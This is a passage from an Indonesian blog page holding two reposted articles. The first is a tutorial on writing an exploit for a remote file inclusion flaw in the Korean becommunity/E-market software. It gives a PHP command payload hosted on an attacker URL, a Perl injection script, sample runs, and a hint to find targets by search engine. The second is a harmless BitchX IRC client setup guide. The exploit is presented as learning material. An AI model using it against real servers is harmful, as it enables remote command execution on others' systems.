alias tidak hanya untuk "becommunity" ini

Terakhir dari aku, semoga ini bermanfaat dan dapat digunakan sebaik baiknya untuk
pembelajaran bersama


C0re
----

Berikut potongan Advisories yang aku buat dan telah aku post ke berbagai situs
security dan juga di publish di echo.or.id


--[snip]--

/*taken from http://echo.or.id/adv/adv06-y3dips-2004.txt

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

E-market is commercial software made by korean company, includes shopping mall,
community , e-crm (e-customer relationship management) , group buying ,weblog,
auction, estimate sheet , and other features

web : http://www.nt.co.kr
http://www.bbs2000.co.kr

Risk: very high ( ***** )
most off all korean sites that handle e-shop , e-banking,... use this
d**n software

else, no more info could get cause the site in korean language :(

---------------------------------------------------------------------------


Vulnerabilities:
~~~~~~~~~~~~~~~~

Remote command execution on 'becommunity' (modules that support by BBS e-market
professional) makes insecure calls to the include() function of PHP (works
on " pageurl= " functions ) which can allow the inclusion of remote files,
and thereby the execution of arbitrary commands by remote user with the web
server user permissions, usually 'nobody' .


http://[TARGET]/becommunity/community/index.php?pageurl=[injection URL]

--[snip]--



C0ding Time
-----------

Yupe, sekarang mari kita racik exploitnya, pertama tama karena ini metode injection
maka kita tetap harus menyiapkan script php di url lain yang akan di eksekusi oleh
webserver target nantinya.

kita buat dulu file tes.txt yang isinya kurang lebih seperti ini

-- cut --

echo "".passthru(' id ')."";
?>

-- cut --

simpan di situs yang anda miliki sehingga URL yang kita dapat adalah
http://www.attacker.com/tes.txt

sekarang kita buat scriptnya,

--------------------------------------xplo.pl-------------------------------

#!/usr/bin/perl -w

# Remote Testing becommunity by y3dips [for testing only]
# Bug find by y3dips , published at http://echo.or.id/adv/adv06-y3dips-2004.txt

print " * Remote Testing becommunity by y3dips *\n";

require LWP::UserAgent;

if(@ARGV == 2)
{

$target= $ARGV[0]; #ambil inputan url target , eg : www.target.com
$xploit= $ARGV[1]; #ambil inputan url exploit ,eg:www.attacker.com/tes.txt

my $ua = LWP::UserAgent->new;
$ua->agent("MSIE/6.0 Windows");
$ua->timeout(10);
$ua->env_proxy;

$url = "http://$target/becommunity/community/index.php?pageurl=$xploit";

my $injek = $ua->get($url);

print "---------------------------------------------------\n";

if ($injek->is_success)
{ print (" $target Sepertinya Vulnerable\n"); }
else { print (" $target Sepertinya Tidak Vulnerable\n"); }

print "---------------------------------------------------\n";

}

else{
print "Gunakan: perl $0 [www.target] [xplo.txt] \n"; #Help options
}


#EOF y3dips(c)2004

-----------------------------------------eof--------------------------------

Sekarang kita coba jalankan exploitnya , sengaja aku cobakan di windows XP,
dengan harapan teman teman lebih mudah menggunakannya (cukup gunakan Active
State Perl)

Mari kita mulai,

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\y3dips>f:

F:\>perl xplo.pl
* Remote Testing becommunity by y3dips *
Gunakan: perl xplo.pl [www.target] [xplo.txt]

Apabila ternyata gagal maka akan menampilkan,

F:\>perl Xplo.pl www.dudul.com www.attacker.com/tes.txt
* Remote Testing becommunity by y3dips *
---------------------------------------------------
www.dudul.com Sepertinya Tidak Vulnerable
---------------------------------------------------


Sedangkan jika berhasil,


F:\>perl Xplo.pl www.target.com www.attacker.com/tes.txt
* Remote Testing becommunity by y3dips *
---------------------------------------------------
www.target.com Sepertinya Vulnerable
---------------------------------------------------

berarti www.target.com kemungkinan besar masih bisa kita injeksi ^_*


Oh iya , untuk target silakan gunakan search engine :) , soalnya kalo sekalian
dilengkapi google bisa panjang banget, yang penting kan maksudnya ngerti (hehe
padahal aku aja yang males)
Oh ya, kalo anda berfikir kita kudu cari di google dulu, itukan pake browser
juga, kenapa gak sekalian aja injek via url (hehehe, kamu benar :D) tetapi
kan tujuan kita belajar bikin exploits :) (pinter banget nge-lesnya kayak tukang
bajaj*, hue hue)

*mungkin target yang vulnerable sudah sangat sedikit sekali dikarenakan advisories
ini sudah di publish pada awal september ke situs2 security (Eg:securityfocus.com)
sehingga kalo banyak yang gagal bukan kesalahan scriptnya, tetapi memang sudah
di patch semua, dan pula artikel ini bukan untuk mencari yang vulnerable tetapi
agar teman teman dapat menyerap ilmunya

Source: echo.or.id

Bookmark and Share


0
Tutorial singkat BitchX

.
Pendahuluan
Banyak para pendatang baru di dunia linux bertanya-tanya, apakah dia bisa ber-irc ria di linux , sebab setahunya cuman ada satu irc client, mirc :). jangan salah.....!!..
linux mempunyai banyak macam irc client, tinggal pilih anda menginginkan yang seperti apa. Ingin client di XWindow, supaya tidak terlalu susah beradaptasi ? ada kvirc, xchat, yagirc, ksirc, bezerck, CirCus, doIRC, MinIRC, dan masih banyak lagi. ingin client yang gak terlalu banyak makan memory, atau anda tidak mempunyai Xwindow terinstall , anda dapat menginstall salah satu dari banyak irc client yang berjalan under console, seperti ircII , epic , BitchX ( yang akan kita bicarakan disini ), blackened, sirc, dirc, ccirc, ERC,ScIRC, dan lain-lain.


BitchX

BitchX adalah sebuah irc client yang basisnya berasal dari ircII ,
merupakan irc client yang mempunyai banyak feature , mungkin yang
terbaik dari semua irc client :) , diantaranya adalah "laporan" saat
anda menerima email , serta jumlah email belum terbaca di mailbox anda
, status yang komplit plit , mudahnya kostumisasi dengan berbagai macam
plugins atau script (salah satunya script tcl) , fungsi 'screen' , yang
memungkinkan anda untuk "menyembunyikan" BitchX anda dan menghidupkan
kembali ( /detach dan scr-bx ),dan berbagai macam feature lainnya yang
karena berbagai alasan tidak bisa saya tulis disini ..hehehehe ;p
File source
Anda bisa mendapatkan file source BitchX , dari salah satu url berikut
:
ftp://ftp.eggdrop.org/pub/BitchX/source/ircii-pana-1.0c17.tar.gz
ftp://ftp.BitchX.com/pub/BitchX/source/BitchX-1.0c17.tar.gz
ftp://ftp.BitchX.com/pub/BitchX/source/ircii-pana-75p3.tar.gz
Kompilasi
Disini saya menggunakan BitchX-1.0c17.tar.gz , tapi hal yang sama
persis dengan dibawah ini,
bisa diterapkan kepada ketiga file yang tertera di atas
$ tar -zxvf BitchX-1.0c17.tar.gz
$ cd BitchX

Cara yang paling mudah dan singkat

$ ./configure
Cara yang lebih panjang , tapi menghasilkan client yang lebih ..wow ;p
$ ./configure -- { dengan segala atributnya :) }

Contoh atributnya :
========================================================================
# tar -zxvf BitchX-1.0c17.tar.gz
# cd BitchX
# cp cp tcl-linux.o source/tcl.o
# ./configure --prefix=/usr --with-tcl ; make ; make install
========================================================================

--prefix=/path
menunjukan path dimana BitchX akan terinsall nantinya , contoh
prefix=/usr
BitchX akan terintall di /usr/bin , dan segala "perlengkapannya" akan
terinstall di /usr/lib/bx
--with-gtk
jika anda memakai option ini ( dan berhasil :)) akan terinstall
'gtkBitchX', sebuah irc client untuk Xwindow , tidak akan terbentuk
BitchX seperti biasanya. catatan : anda harus memiliki gtk , gnome-lib
, glib , dan imlib lengkap dengan paket develnya .
--with-pm
untuk membentuk pmBitchX , irx client untuk OS/2 , saya rasa anda tidak
membutuhkannya ;)~
--with-w32
BitchX.exe ...sound familiar,huh ? hehe.. yang jelas anda butuh cross
compiler ( i guess ;)~ .. CMIIW )
--enable-sound
untuk membuat BitchX anda bersuara , nggak cuma beep..beep :) , hanya
dapat digunakan oleh gtkBitchX
--with-tcl
untuk mengaktifkan tcl support , digunakan untuk scripting. Untuk
melakukan hal ini, anda harus mengcopy file tcl-linux.o di dir BitchX/
menjadi BitchX/source/tcl.o . Anda juga harus memiliki tcl terinstall
dengan baik. Catatan, untuk pengguna SuSE ( mungkin juga distro yang
lain ) anda membutuhkan symlink di /usr/lib ( cd /usr/lib ; ln -s
tcl8.x.so tcl.so ; tcl8.x diganti sesuai yang terinstall di sistem anda
)
--with-plugins
mengaktifkan plugins support , BitchX merupakan irc client yang sangat
"kaya" , dengan plugins ini , anda bisa merubah BitchX anda dari sebuah
irc client menjadi napster client , AOL client , yahoo messenger , dan
berbagai macam feature-feature menarik lainnya ( recomended ) .
--with-maildir=/path
mengaktifkan qmail support , dengan menunjukan maildir anda, standar =
$HOME/Maildir
--with-default-server
jika anda membutuhkan default server yang akan dipakai BitchX
--with-ipv6-support
mengaktifkan support ipv6 , sistem ip masa depan dengan 6 blok. kernel
anda juga harus mempunyai support ini jika anda ingin mengaktikannya .
(kayaknya belum dibutuhin buat saat ini ;)~ )
--with-socks =
untuk mengaktifkan socks support , bagi anda-anda yang berada di
belakang firewall . anda harus memiliki socks terinstall di sistem .
--enable-cdrom =
jika anda ingin mengakses cdrom lewat BitchX anda
$ make
Instalasi
Jika anda tidak punya akses root , atau gak pengen bagi-bagi nich
BitchX buat yang lain, anda bisa melakukan instalasi local di home
directory dengan cara :
$ make install_local
Jika anda mempunyai akses root , dan ingin menginstalasi BitchX di
sistem sehingga bisa dipakai semua user, lakukan :
$ su
akan terdapat prompt password , isikan password root
# make install

Konfigurasi
BitchX hasil instalasi anda tadi, dapat digunakan segera , dengan
sintaks
BitchX [nick] [server]
Contoh : BitchX ^dodol^ irc.dal.net

Tapi jika anda ingin yang lebih praktis tidak ingin nulis
panjang-panjang, mudah saja anda bisa menuliskannya di profil anda.
Jika anda menggunakan bash sebagai interpreter anda , anda bisa
menambahkan hal semacam ini di file ~/.bashrc anda .

export IRCNICK="tukang_chatting"
export IRCNAME="sleighter is a lewser"
export IRCSERVER="irc.ngaco.net"
export IRCPORT="6667"

selanjutnya , anda tinggal menjalankan perintah 'BitchX' untuk memulai
ber-irc ria .
BitchX akan segera menuju irc.ngaco.net dengan nickname tukang_chatting
:) .

Feature standar
Ada banyak feature standar BitchX , yang kurang dimengerti banyak orang
yang mengakibatkan BitchX "difitnah" sebagai irc client yang kurang
bagus.
Sedikit diantaranya akan saya utarakan disini .
BitchX dapat menyimpan semua konfigurasinya di satu file, yaitu
.bitchxrc . File ini akan dibaca oleh BitchX setiap di dieksekusi.
Contohnya loading script, plugins, berbagai macam setting , binding
function, dan lain sebagainya.
Contoh bitchxrc ini bisa anda dapatkan di %prefix/lib/bx/script.

BitchX bisa memiliki banyak window. Anda bisa menambah jumlah window di
BitchX dengan perintah /window new.
Window anda akan segera terbelah menjadi 2 , lumayan mengganggu :)

Jika anda ingin membuat window baru yang terpisah, gunakan

/window new hide

Anda bisa berpindah window dengan alt+angka.
Ini dapat di otomatisasi dengan
/set join_new_window on
/set query_new_window on

tetapi hal ini akan cukup merepotkan bagi yang mempunyai gebetan
banyak, karena mungkin saja gebetan itu akan dimasukan ke window 11
oleh BitchX, window yang tak terjangkau tangan kita :) .

Saya sendiri lebih suka mengotomatisasi dengan cara menambahkan command
pembuatan window di file konifigurasi.bitchxrc,
^window new hide

sebanyak 9 baris di .bitchxrc :) BitchX bukan hanya sebuah irc client .
selain sebagai irc client , seperti telah saya sebutkan di atas ,
BitchX bisa "berubah" menjadi napster client , American AOL instant
messenger , mp3 player , ftp client , mail client ( semuanya tersedia
di BitchX versi ini), yahoo messenger ( perlu download plugins baru) ,
dan beberapa macam fungsi lainnya .

Beberapa command yang mungkin berguna bagi anda
a. /help , anda tentu tahu untuk apa perintah ini :). dari sinilah saya
belajar semua ini.
b. /unig , untuk meng-unignore . jika gagal ( mungkin gagal untuk
nickname diatas 8 huruf ) anda bisa melihat ignore list terlebih dahulu
dengan command /ignore, kemudian melakukan /ignore
yang@tertera.di.ignore.list NONE
c. /chat atau /nochat , untuk menerima atau menolak dcc chat
d. /msg = , untuk 'ngobrol' pada dcc chat
e. /l , meninggalkan suatu channel
f. /q untuk membuka 'dedicated chat';)~ dengan seseorang , ditutup
dengan /q
g. /quit :)
Penutup
Jika anda masih mempunyai masalah dengan BitchX anda , atau merasa
tulisan saya ini masih kurang , silakan datang ke :

#BitchX efnet, channel resmi pertolongan untuk BitchX

#antihackerlink,#e-c-h-o dalnet, markas besar penulis, atau
#coreBSD efnet

Source: IndoLinux

Bookmark and Share


 
Ujie Caprone | © 2011 Blogger Template by Ujiecaprone.com